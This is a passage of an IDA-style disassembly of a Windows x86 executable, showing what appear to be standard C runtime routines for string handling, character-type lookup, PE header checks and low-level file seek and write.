		mov	edx, eax

loc_40CB7B:				; CODE XREF: sub_40CB3D+44j
		cmp	[edx], bl
		jz	short loc_40CB83
		inc	edx
		dec	edi
		jnz	short loc_40CB7B

loc_40CB83:				; CODE XREF: sub_40CB3D+40j
		cmp	edi, ebx
		jz	short loc_40CB75

loc_40CB87:				; CODE XREF: sub_40CB3D+55j
		mov	cl, [esi]
		mov	[edx], cl
		inc	edx
		inc	esi
		cmp	cl, bl
		jz	short loc_40CB94
		dec	edi
		jnz	short loc_40CB87

loc_40CB94:				; CODE XREF: sub_40CB3D+52j
		cmp	edi, ebx
		jnz	short loc_40CBA8
		mov	[eax], bl
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CB5C
; ---------------------------------------------------------------------------

loc_40CBA8:				; CODE XREF: sub_40CB3D+59j
		xor	eax, eax

loc_40CBAA:				; CODE XREF: sub_40CB3D+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40CB3D	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CBC4:				; CODE XREF: .text:0040CBD1j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CBD3
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CBC4
; ---------------------------------------------------------------------------

loc_40CBD3:				; CODE XREF: .text:0040CBC8j
		mov	esi, [ebp+8]
		or	ecx, 0FFFFFFFFh
		lea	ecx, [ecx+0]

loc_40CBDC:				; CODE XREF: .text:0040CBECj
		add	ecx, 1
		mov	al, [esi]
		or	al, al
		jz	short loc_40CBEE
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CBDC

loc_40CBEE:				; CODE XREF: .text:0040CBE3j
		mov	eax, ecx
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CBF6	proc near		; CODE XREF: sub_409E64+F1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	[ebp+arg_C], ebx
		push	edi
		jnz	short loc_40CC16
		cmp	esi, ebx
		jnz	short loc_40CC1A
		cmp	[ebp+arg_4], ebx
		jnz	short loc_40CC21

loc_40CC0F:				; CODE XREF: sub_40CBF6+4Dj
					; sub_40CBF6+8Cj
		xor	eax, eax

loc_40CC11:				; CODE XREF: sub_40CBF6+44j
					; sub_40CBF6+9Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40CC16:				; CODE XREF: sub_40CBF6+Ej
		cmp	esi, ebx
		jz	short loc_40CC21

loc_40CC1A:				; CODE XREF: sub_40CBF6+12j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		ja	short loc_40CC3C

loc_40CC21:				; CODE XREF: sub_40CBF6+17j
					; sub_40CBF6+22j ...
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CC2B:				; CODE XREF: sub_40CBF6+B1j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CC11
; ---------------------------------------------------------------------------

loc_40CC3C:				; CODE XREF: sub_40CBF6+29j
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CC45
		mov	[esi], bl
		jmp	short loc_40CC0F
; ---------------------------------------------------------------------------

loc_40CC45:				; CODE XREF: sub_40CBF6+49j
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		jnz	short loc_40CC50
		mov	[esi], bl
		jmp	short loc_40CC21
; ---------------------------------------------------------------------------

loc_40CC50:				; CODE XREF: sub_40CBF6+54j
		cmp	[ebp+arg_C], 0FFFFFFFFh
		mov	eax, esi
		jnz	short loc_40CC67

loc_40CC58:				; CODE XREF: sub_40CBF6+6Dj
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CC80
		dec	edi
		jnz	short loc_40CC58
		jmp	short loc_40CC80
; ---------------------------------------------------------------------------

loc_40CC67:				; CODE XREF: sub_40CBF6+60j
					; sub_40CBF6+81j
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CC79
		dec	edi
		jz	short loc_40CC79
		dec	[ebp+arg_C]
		jnz	short loc_40CC67

loc_40CC79:				; CODE XREF: sub_40CBF6+79j
					; sub_40CBF6+7Cj
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CC80
		mov	[eax], bl

loc_40CC80:				; CODE XREF: sub_40CBF6+6Aj
					; sub_40CBF6+6Fj ...
		cmp	edi, ebx
		jnz	short loc_40CC0F
		cmp	[ebp+arg_C], 0FFFFFFFFh
		jnz	short loc_40CC99
		mov	eax, [ebp+arg_4]
		push	50h
		mov	[esi+eax-1], bl
		pop	eax
		jmp	loc_40CC11
; ---------------------------------------------------------------------------

loc_40CC99:				; CODE XREF: sub_40CBF6+92j
		mov	[esi], bl
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CC2B
sub_40CBF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CCA9	proc near		; CODE XREF: sub_40ED77+32p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		and	[ebp+var_4], 0
		push	ebx
		mov	ebx, [ebp+arg_8]
		test	ebx, ebx
		jnz	short loc_40CCC0
		xor	eax, eax
		jmp	loc_40CD5A
; ---------------------------------------------------------------------------

loc_40CCC0:				; CODE XREF: sub_40CCA9+Ej
		cmp	ebx, 4
		push	edi
		jb	short loc_40CD3B
		lea	edi, [ebx-4]
		test	edi, edi
		jbe	short loc_40CD3B
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]

loc_40CCD3:				; CODE XREF: sub_40CCA9+66j
		mov	dl, [eax]
		add	eax, 4
		add	ecx, 4
		test	dl, dl
		jz	short loc_40CD31
		cmp	dl, [ecx-4]
		jnz	short loc_40CD31
		mov	dl, [eax-3]
		test	dl, dl
		jz	short loc_40CD27
		cmp	dl, [ecx-3]
		jnz	short loc_40CD27
		mov	dl, [eax-2]
		test	dl, dl
		jz	short loc_40CD1D
		cmp	dl, [ecx-2]
		jnz	short loc_40CD1D
		mov	dl, [eax-1]
		test	dl, dl
		jz	short loc_40CD13
		cmp	dl, [ecx-1]
		jnz	short loc_40CD13
		add	[ebp+var_4], 4
		cmp	[ebp+var_4], edi
		jb	short loc_40CCD3
		jmp	short loc_40CD52
; ---------------------------------------------------------------------------

loc_40CD13:				; CODE XREF: sub_40CCA9+58j
					; sub_40CCA9+5Dj
		movzx	eax, byte ptr [eax-1]
		movzx	ecx, byte ptr [ecx-1]
		jmp	short loc_40CD63
; ---------------------------------------------------------------------------

loc_40CD1D:				; CODE XREF: sub_40CCA9+4Cj
					; sub_40CCA9+51j
		movzx	eax, byte ptr [eax-2]
		movzx	ecx, byte ptr [ecx-2]
		jmp	short loc_40CD63
; ---------------------------------------------------------------------------

loc_40CD27:				; CODE XREF: sub_40CCA9+40j
					; sub_40CCA9+45j
		movzx	eax, byte ptr [eax-3]
		movzx	ecx, byte ptr [ecx-3]
		jmp	short loc_40CD63
; ---------------------------------------------------------------------------

loc_40CD31:				; CODE XREF: sub_40CCA9+34j
					; sub_40CCA9+39j
		movzx	eax, byte ptr [eax-4]
		movzx	ecx, byte ptr [ecx-4]
		jmp	short loc_40CD63
; ---------------------------------------------------------------------------

loc_40CD3B:				; CODE XREF: sub_40CCA9+1Bj
					; sub_40CCA9+22j
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]
		jmp	short loc_40CD52
; ---------------------------------------------------------------------------

loc_40CD43:				; CODE XREF: sub_40CCA9+ACj
		mov	dl, [eax]
		test	dl, dl
		jz	short loc_40CD5D
		cmp	dl, [ecx]
		jnz	short loc_40CD5D
		inc	eax
		inc	ecx
		inc	[ebp+var_4]

loc_40CD52:				; CODE XREF: sub_40CCA9+68j
					; sub_40CCA9+98j
		cmp	[ebp+var_4], ebx
		jb	short loc_40CD43
		xor	eax, eax

loc_40CD59:				; CODE XREF: sub_40CCA9+BCj
		pop	edi

loc_40CD5A:				; CODE XREF: sub_40CCA9+12j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40CD5D:				; CODE XREF: sub_40CCA9+9Ej
					; sub_40CCA9+A2j
		movzx	eax, byte ptr [eax]
		movzx	ecx, byte ptr [ecx]

loc_40CD63:				; CODE XREF: sub_40CCA9+72j
					; sub_40CCA9+7Cj ...
		sub	eax, ecx
		jmp	short loc_40CD59
sub_40CCA9	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CD84:				; CODE XREF: .text:0040CD91j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CD93
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CD84
; ---------------------------------------------------------------------------

loc_40CD93:				; CODE XREF: .text:0040CD88j
		mov	esi, [ebp+8]
		mov	edi, edi

loc_40CD98:				; CODE XREF: .text:0040CDA5j
		mov	al, [esi]
		or	al, al
		jz	short loc_40CDAA
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CD98
		lea	eax, [esi-1]

loc_40CDAA:				; CODE XREF: .text:0040CD9Cj
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CDB0	proc near		; CODE XREF: sub_405A0A+93p
					; sub_406D87+34Dp ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		movzx	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, 8000h
		cmp	[ebp+var_4], 0
		jz	short locret_40CDE4
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40CDE4:				; CODE XREF: sub_40CDB0+2Bj
		leave
		retn
sub_40CDB0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CDE6	proc near		; CODE XREF: sub_409217+6CBp
					; sub_409217+B85p ...

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_40CDB0
		pop	ecx
		pop	ecx
		retn
sub_40CDE6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CDF4	proc near		; CODE XREF: sub_405A0A+32p
					; sub_40A7DB+81p ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_6		= byte ptr -6
var_4		= word ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_18]
		call	sub_402ADF
		mov	ebx, [ebp+arg_0]
		lea	eax, [ebx+1]
		cmp	eax, 100h
		ja	short loc_40CE22
		mov	eax, [ebp+var_18]
		mov	eax, [eax+0C8h]
		movzx	eax, word ptr [eax+ebx*2]
		jmp	short loc_40CE97
; ---------------------------------------------------------------------------

loc_40CE22:				; CODE XREF: sub_40CDF4+1Dj
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CDB0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40CE53
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_8], al
		mov	[ebp+var_7], bl
		mov	[ebp+var_6], 0
		pop	ecx
		jmp	short loc_40CE5D
; ---------------------------------------------------------------------------

loc_40CE53:				; CODE XREF: sub_40CDF4+4Bj
		xor	ecx, ecx
		mov	[ebp+var_8], bl
		mov	[ebp+var_7], 0
		inc	ecx

loc_40CE5D:				; CODE XREF: sub_40CDF4+5Dj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+14h]
		push	dword ptr [eax+4]
		lea	eax, [ebp+var_4]
		push	eax
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_18]
		push	1
		push	eax
		call	sub_40C8A4
		add	esp, 20h
		test	eax, eax
		jnz	short loc_40CE93
		cmp	[ebp+var_C], al
		jz	short loc_40CE8F
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40CE8F:				; CODE XREF: sub_40CDF4+92j
		xor	eax, eax
		jmp	short loc_40CEA7
; ---------------------------------------------------------------------------

loc_40CE93:				; CODE XREF: sub_40CDF4+8Dj
		movzx	eax, [ebp+var_4]

loc_40CE97:				; CODE XREF: sub_40CDF4+2Cj
		and	eax, [ebp+arg_4]
		cmp	[ebp+var_C], 0
		jz	short loc_40CEA7
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40CEA7:				; CODE XREF: sub_40CDF4+9Dj
					; sub_40CDF4+AAj
		pop	ebx
		leave
		retn
sub_40CDF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CEAA	proc near		; CODE XREF: sub_407EC9+Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427A5C, eax
		retn
sub_40CEAA	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CEB4	proc near		; DATA XREF: sub_40CEC4:loc_40CF29o

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	ds:off_41D11C
		xor	eax, eax
		inc	eax
		retn	8
sub_40CEB4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CEC4	proc near		; CODE XREF: sub_405C31+26p
					; sub_405CE4+78p ...

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	14h
		push	offset dword_421A70
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	dword_427A5C
		call	sub_405543
		pop	ecx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40CF3A
		lea	eax, [ebp+var_1C]
		push	eax
		call	sub_407CB6
		pop	ecx
		cmp	eax, edi
		jz	short loc_40CF02
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4031FD
		add	esp, 14h

loc_40CF02:				; CODE XREF: sub_40CEC4+2Fj
		cmp	[ebp+var_1C], 1
		jz	short loc_40CF29
		push	offset aKernel32_dl_10 ; "kernel32.dll"
		call	ds:dword_41D0E0	; GetModuleHandleA
		cmp	eax, edi
		jz	short loc_40CF29
		push	offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
		push	eax
		call	ds:off_41D0E8
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40CF2E

loc_40CF29:				; CODE XREF: sub_40CEC4+42j
					; sub_40CEC4+51j
		mov	esi, offset sub_40CEB4

loc_40CF2E:				; CODE XREF: sub_40CEC4+63j
		push	esi
		call	sub_4054D7
		pop	ecx
		mov	dword_427A5C, eax

loc_40CF3A:				; CODE XREF: sub_40CEC4+21j
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; MultiByteToWideChar
		mov	[ebp+var_20], eax
		jmp	short loc_40CF79
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		mov	[ebp+var_24], eax
		xor	ecx, ecx
		cmp	eax, 0C0000017h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		cmp	[ebp+var_24], 0C0000017h
		jnz	short loc_40CF75
		push	8
		call	ds:dword_41D170	; RtlRestoreLastWin32Error

loc_40CF75:				; CODE XREF: sub_40CEC4+A7j
		and	[ebp+var_20], 0

loc_40CF79:				; CODE XREF: sub_40CEC4+84j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
sub_40CEC4	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40CF90	proc near		; CODE XREF: sub_40D002+16p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		cmp	word ptr [ecx],	5A4Dh
		jz	short loc_40CF9E

loc_40CF9B:				; CODE XREF: sub_40CF90+19j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40CF9E:				; CODE XREF: sub_40CF90+9j
		mov	eax, [ecx+3Ch]
		add	eax, ecx
		cmp	dword ptr [eax], 4550h
		jnz	short loc_40CF9B
		xor	ecx, ecx
		cmp	word ptr [eax+18h], 10Bh
		setz	cl
		mov	eax, ecx
		retn
sub_40CF90	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40CFC0	proc near		; CODE XREF: sub_40D002+27p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		mov	ecx, [eax+3Ch]
		add	ecx, eax
		movzx	eax, word ptr [ecx+14h]
		push	ebx
		push	esi
		movzx	esi, word ptr [ecx+6]
		xor	edx, edx
		test	esi, esi
		push	edi
		lea	eax, [eax+ecx+18h]
		jbe	short loc_40CFFC
		mov	edi, [esp+0Ch+arg_4]

loc_40CFE2:				; CODE XREF: sub_40CFC0+3Aj
		mov	ecx, [eax+0Ch]
		cmp	edi, ecx
		jb	short loc_40CFF2
		mov	ebx, [eax+8]
		add	ebx, ecx
		cmp	edi, ebx
		jb	short loc_40CFFE

loc_40CFF2:				; CODE XREF: sub_40CFC0+27j
		add	edx, 1
		add	eax, 28h
		cmp	edx, esi
		jb	short loc_40CFE2

loc_40CFFC:				; CODE XREF: sub_40CFC0+1Cj
		xor	eax, eax

loc_40CFFE:				; CODE XREF: sub_40CFC0+30j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40CFC0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D002	proc near		; CODE XREF: sub_4069F0+FFp
					; sub_407D29+Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_421A90
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		mov	edx, 400000h
		push	edx
		call	sub_40CF90
		pop	ecx
		test	eax, eax
		jz	short loc_40D05F
		mov	eax, [ebp+arg_0]
		sub	eax, edx
		push	eax
		push	edx
		call	sub_40CFC0
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40D05F
		mov	eax, [eax+24h]
		shr	eax, 1Fh
		not	eax
		and	eax, 1
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_40D068
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		xor	ecx, ecx
		cmp	eax, 0C0000005h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40D05F:				; CODE XREF: sub_40D002+1Ej
					; sub_40D002+30j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		xor	eax, eax

loc_40D068:				; CODE XREF: sub_40D002+44j
		call	__SEH_epilog4
		retn
sub_40D002	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D06E	proc near		; CODE XREF: sub_40A15D+2EEp
					; sub_40A15D+3C8p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_8]
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		call	sub_40F12D
		or	edi, 0FFFFFFFFh
		cmp	eax, edi
		pop	ecx
		jnz	short loc_40D0A3
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_40D09D:				; CODE XREF: sub_40D06E+5Ej
		mov	eax, edi
		mov	edx, edi
		jmp	short loc_40D0ED
; ---------------------------------------------------------------------------

loc_40D0A3:				; CODE XREF: sub_40D06E+22j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_4]
		push	ecx
		push	[ebp+var_8]
		push	eax
		call	ds:off_41D074
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40D0CE
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		test	eax, eax
		jz	short loc_40D0CE
		push	eax
		call	sub_405BA9
		pop	ecx
		jmp	short loc_40D09D
; ---------------------------------------------------------------------------

loc_40D0CE:				; CODE XREF: sub_40D06E+4Bj
					; sub_40D06E+55j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, [ebp+var_8]
		mov	edx, [ebp+var_4]

loc_40D0ED:				; CODE XREF: sub_40D06E+33j
		pop	edi
		pop	esi
		leave
		retn
sub_40D06E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D0F1	proc near		; CODE XREF: sub_406B86+116p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	14h
		push	offset dword_421AB0
		call	__SEH_prolog4
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_24], esi
		mov	[ebp+var_20], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40D12A
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_40D121:				; CODE XREF: sub_40D0F1+66j
		mov	eax, esi
		mov	edx, esi
		jmp	loc_40D1FA
; ---------------------------------------------------------------------------

loc_40D12A:				; CODE XREF: sub_40D0F1+1Bj
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40D138
		cmp	eax, dword_4352E8
		jb	short loc_40D159

loc_40D138:				; CODE XREF: sub_40D0F1+3Dj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40D121
; ---------------------------------------------------------------------------

loc_40D159:				; CODE XREF: sub_40D0F1+45j
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:435300h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jnz	short loc_40D19F
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		or	edx, 0FFFFFFFFh
		mov	eax, edx
		jmp	short loc_40D1FA
; ---------------------------------------------------------------------------

loc_40D19F:				; CODE XREF: sub_40D0F1+86j
		push	eax
		call	sub_40F19E
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40D1CE
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D06E
		add	esp, 10h
		mov	[ebp+var_24], eax
		mov	[ebp+var_20], edx
		jmp	short loc_40D1E8
; ---------------------------------------------------------------------------

loc_40D1CE:				; CODE XREF: sub_40D0F1+BFj
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		mov	[eax], edi
		or	[ebp+var_24], 0FFFFFFFFh
		or	[ebp+var_20], 0FFFFFFFFh

loc_40D1E8:				; CODE XREF: sub_40D0F1+DBj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40D200
		mov	eax, [ebp+var_24]
		mov	edx, [ebp+var_20]

loc_40D1FA:				; CODE XREF: sub_40D0F1+34j
					; sub_40D0F1+ACj
		call	__SEH_epilog4
		retn
sub_40D0F1	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D200	proc near		; CODE XREF: sub_40D0F1+FEp
					; DATA XREF: _1fieagrn:00421AC8o
		push	dword ptr [ebp+8]
		call	sub_40F23E
		pop	ecx
		retn
sub_40D200	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=518h


sub_40D20A	proc near		; CODE XREF: sub_40D7D0+9Ap
					; sub_410957+BBp

var_594		= dword	ptr -594h
var_590		= dword	ptr -590h
var_58C		= dword	ptr -58Ch
var_588		= dword	ptr -588h
var_584		= dword	ptr -584h
var_580		= dword	ptr -580h
var_57C		= dword	ptr -57Ch
var_578		= dword	ptr -578h
var_574		= dword	ptr -574h
var_56D		= byte ptr -56Dh
var_56C		= dword	ptr -56Ch
var_568		= dword	ptr -568h
var_564		= byte ptr -564h
var_410		= byte ptr -410h
var_160		= byte ptr -160h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		lea	ebp, [esp-518h]
		sub	esp, 594h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+518h+var_4], eax
		mov	eax, [ebp+518h+arg_4]
		push	esi
		xor	esi, esi
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_57C], eax
		mov	[ebp+518h+var_578], esi
		mov	[ebp+518h+var_580], esi
		jnz	short loc_40D246
		xor	eax, eax
		jmp	loc_40D7BA
; ---------------------------------------------------------------------------

loc_40D246:				; CODE XREF: sub_40D20A+33j
		cmp	eax, esi
		jnz	short loc_40D271
		call	sub_405B96
		mov	[eax], esi
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40D7BA
; ---------------------------------------------------------------------------

loc_40D271:				; CODE XREF: sub_40D20A+3Ej
		mov	esi, [ebp+518h+arg_0]
		push	ebx
		mov	ebx, esi
		and	ebx, 1Fh
		imul	ebx, 28h
		mov	eax, esi
		sar	eax, 5
		push	edi
		lea	edi, ds:435300h[eax*4]
		mov	eax, [edi]
		add	eax, ebx
		mov	cl, [eax+24h]
		add	cl, cl
		sar	cl, 1
		cmp	cl, 2
		mov	[ebp+518h+var_588], edi
		mov	[ebp+518h+var_56D], cl
		jz	short loc_40D2A8
		cmp	cl, 1
		jnz	short loc_40D2DB

loc_40D2A8:				; CODE XREF: sub_40D20A+97j
		mov	ecx, [ebp+518h+arg_8]
		not	ecx
		test	cl, 1
		jnz	short loc_40D2DB
		call	sub_405B96
		xor	esi, esi
		mov	[eax], esi
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		jmp	loc_40D7B0
; ---------------------------------------------------------------------------

loc_40D2DB:				; CODE XREF: sub_40D20A+9Cj
					; sub_40D20A+A9j
		test	byte ptr [eax+4], 20h
		jz	short loc_40D2F0
		push	2
		push	0
		push	0
		push	esi
		call	sub_40D06E
		add	esp, 10h

loc_40D2F0:				; CODE XREF: sub_40D20A+D5j
		push	esi
		call	sub_40D8F0
		test	eax, eax
		pop	ecx
		jz	loc_40D4F5
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 80h
		jz	loc_40D4F5
		call	sub_40574D
		mov	eax, [eax+6Ch]
		xor	ecx, ecx
		cmp	[eax+14h], ecx
		lea	eax, [ebp+518h+var_594]
		setz	cl
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		mov	esi, ecx
		call	ds:off_41D114
		test	eax, eax
		jz	loc_40D4F5
		test	esi, esi
		jz	short loc_40D343
		cmp	[ebp+518h+var_56D], 0
		jz	loc_40D4F5

loc_40D343:				; CODE XREF: sub_40D20A+12Dj
		call	ds:off_41D118
		and	[ebp+518h+var_568], 0
		cmp	[ebp+518h+arg_8], 0
		mov	esi, [ebp+518h+var_57C]
		mov	[ebp+518h+var_594], eax
		mov	[ebp+518h+var_58C], esi
		jbe	loc_40D762
		and	[ebp+518h+var_574], 0
		jmp	short loc_40D36C
